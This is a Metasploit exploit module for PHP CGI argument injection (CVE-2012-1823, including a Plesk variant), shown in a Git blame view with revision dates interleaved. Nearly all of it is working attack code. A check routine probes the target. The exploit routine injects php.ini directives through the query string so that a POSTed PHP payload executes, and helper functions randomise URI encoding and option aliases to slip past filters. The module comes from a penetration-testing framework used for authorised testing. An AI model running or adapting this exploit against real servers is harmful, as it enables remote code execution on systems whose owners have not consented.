Files
metasploit-gs/modules/exploits/multi/http/php_cgi_arg_injection.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

227 lines
6.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2012-05-04 10:19:37 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP CGI Argument Injection',
'Description' => %q{
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
an argument injection vulnerability. This module takes advantage of
the -d flag to set php.ini directives to achieve code execution.
2012-05-04 00:01:03 -05:00
From the advisory: "if there is NO unescaped '=' in the query string,
the string is split on '+' (encoded space) characters, urldecoded,
passed to a function that escapes shell metacharacters (the "encoded in
a system-defined manner" from the RFC) and then passes them to the CGI
binary." This module can also be used to exploit the plesk 0day disclosed
by kingcope and exploited in the wild on June 2013.
},
2012-08-07 15:59:01 -05:00
'Author' =>
[
'egypt', 'hdm', #original msf exploit
'jjarmoc', #added URI encoding obfuscation
'kingcope', #plesk poc
'juan vazquez' #add support for plesk exploitation
2012-08-07 15:59:01 -05:00
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2012-1823' ],
[ 'OSVDB', '81633'],
[ 'OSVDB', '93979'],
[ 'EDB', '25986'],
[ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],
[ 'URL', 'http://kb.parallels.com/en/116241']
2012-05-03 19:00:40 -06:00
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# response body, so really it's unlimited
'Space' => 262144, # 256k
},
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2012-05-03',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
register_options([
OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",0]),
OptBool.new('PLESK', [true, "Exploit Plesk", false]),
])
end
2013-08-30 16:28:54 -05:00
2012-05-03 19:00:40 -06:00
# php-cgi -h
# ...
# -s Display colour syntax highlighted source.
def check
2013-08-30 16:28:54 -05:00
2014-01-21 14:10:35 -06:00
vprint_status("Checking uri #{uri}")
2013-08-30 16:28:54 -05:00
response = send_request_raw({ 'uri' => uri })
2013-08-30 16:28:54 -05:00
if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi and not datastore['PLESK']
2014-01-21 14:10:35 -06:00
vprint_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
2012-05-03 19:00:40 -06:00
return Exploit::CheckCode::Unknown
end
2013-08-30 16:28:54 -05:00
2012-05-11 11:31:26 -05:00
response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"})
if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
return Exploit::CheckCode::Vulnerable
end
2013-08-30 16:28:54 -05:00
if datastore['PLESK'] and response and response.code == 500
return Exploit::CheckCode::Appears
end
2013-08-30 16:28:54 -05:00
2014-01-21 14:10:35 -06:00
vprint_error("Server responded indicating it was not vulnerable")
return Exploit::CheckCode::Safe
end
2013-08-30 16:28:54 -05:00
def uri
if datastore['PLESK']
normalize_uri("phppath", "php")
else
normalize_uri(target_uri.path).gsub(/\?.*/, "")
end
end
2013-08-30 16:28:54 -05:00
def uri_encoding_level
if datastore['PLESK']
return 0
else
return datastore['URIENCODING']
end
end
2013-08-30 16:28:54 -05:00
def exploit
begin
args = [
2012-05-11 11:31:26 -05:00
rand_spaces(),
create_arg("-d","allow_url_include=#{rand_php_ini_true}"),
create_arg("-d","safe_mode=#{rand_php_ini_false}"),
create_arg("-d","suhosin.simulation=#{rand_php_ini_true}"),
create_arg("-d",'disable_functions=""'),
create_arg("-d","open_basedir=none"),
create_arg("-d","auto_prepend_file=php://input"),
2017-02-08 09:59:22 +01:00
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
create_arg("-d", "cgi.redirect_status_env=0"),
rand_opt_equiv("-n")
]
2013-08-30 16:28:54 -05:00
qs = args.join()
2013-08-30 16:28:54 -05:00
# Has to be all on one line, so gsub out the comments and the newlines
2012-05-04 17:32:07 -06:00
payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
response = send_request_cgi( {
'method' => "POST",
'global' => true,
'uri' => "#{uri}?#{qs}",
'data' => payload_oneline,
}, 0.5)
handler
2013-08-30 16:28:54 -05:00
rescue ::Interrupt
raise $!
rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
print_error("The target service unreachable")
rescue ::OpenSSL::SSL::SSLError
print_error("The target failed to negotiate SSL, is this really an SSL service?")
end
2013-08-30 16:28:54 -05:00
end
2013-08-30 16:28:54 -05:00
2012-05-09 11:01:15 -05:00
def create_arg(arg, val = nil)
2012-08-07 15:59:01 -05:00
if val
val = rand_encode(val)
val.gsub!('=','%3d') # = must always be encoded
2012-06-12 20:00:28 -05:00
val.gsub!('"','%22') # " too
end
2013-08-30 16:28:54 -05:00
2012-05-09 11:01:15 -05:00
ret = ''
2012-05-11 11:31:26 -05:00
ret << "#{rand_spaces}"
ret << "#{rand_opt_equiv(arg)}"
ret << "#{rand_space}"
2012-05-11 11:31:26 -05:00
ret << "#{rand_spaces}"
2012-05-09 11:01:15 -05:00
ret << "#{val}"
ret << "#{rand_space}"
end
2013-08-30 16:28:54 -05:00
2012-05-11 11:31:26 -05:00
def rand_opt_equiv(opt)
# Returns a random equivilant option from mapping at
# http://www.php.net/manual/en/features.commandline.options.php
2012-05-11 11:31:26 -05:00
opt_equivs = {
"-d" => [
2012-08-07 15:59:01 -05:00
"#{rand_dash}#{rand_encode("d")}",
2012-05-11 11:31:26 -05:00
"#{rand_dash}#{rand_dash}#{rand_encode("define")}"
],
"-s" => [
2012-08-07 15:59:01 -05:00
"#{rand_dash}#{rand_encode("s")}",
"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlight")}",
2012-05-11 11:31:26 -05:00
"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlighting")}"
2012-08-07 15:59:01 -05:00
],
2012-05-11 11:31:26 -05:00
"-T" => [
2012-08-07 15:59:01 -05:00
"#{rand_dash}#{rand_encode("T")}",
2012-05-11 11:31:26 -05:00
"#{rand_dash}#{rand_dash}#{rand_encode("timing")}"
],
"-n" => [
2012-08-07 15:59:01 -05:00
"#{rand_dash}#{rand_encode("n")}",
2012-05-11 11:31:26 -05:00
"#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}"
]
}
2013-08-30 16:28:54 -05:00
2012-05-11 11:31:26 -05:00
equivs = opt_equivs[opt]
2012-08-07 15:59:01 -05:00
equivs ? equivs[rand(opt_equivs[opt].length)] : opt
2013-08-30 16:28:54 -05:00
2012-05-11 11:31:26 -05:00
end
2013-08-30 16:28:54 -05:00
def rand_encode(string, max = string.length)
2012-05-11 11:31:26 -05:00
# Randomly URI encode characters from string, up to max times.
chars = [];
if max > uri_encoding_level then max = uri_encoding_level end
2012-08-07 15:59:01 -05:00
if string.length == 1
if rand(2) > 0
chars << 0
end
2012-08-07 15:59:01 -05:00
else
if max > 0
max.times { chars << rand(string.length)}
end
end
chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-noslashes")}
string
2012-05-09 11:01:15 -05:00
end
2013-08-30 16:28:54 -05:00
def rand_spaces(num = uri_encoding_level)
2012-05-09 11:01:15 -05:00
ret = ''
2012-10-14 19:16:54 -05:00
num.times {
ret << rand_space
}
ret
2012-05-09 11:01:15 -05:00
end
2013-08-30 16:28:54 -05:00
2012-05-09 11:01:15 -05:00
def rand_space
uri_encoding_level > 0 ? ["%20","%09","+"][rand(3)] : "+"
2012-05-09 11:01:15 -05:00
end
2013-08-30 16:28:54 -05:00
2012-05-09 11:01:15 -05:00
def rand_dash
uri_encoding_level > 0 ? ["-","%2d","%2D"][rand(3)] : "-"
2012-05-09 11:01:15 -05:00
end
2013-08-30 16:28:54 -05:00
def rand_php_ini_false
2012-05-04 17:32:07 -06:00
Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])
end
2013-08-30 16:28:54 -05:00
def rand_php_ini_true
2012-05-04 17:32:07 -06:00
Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])
end
end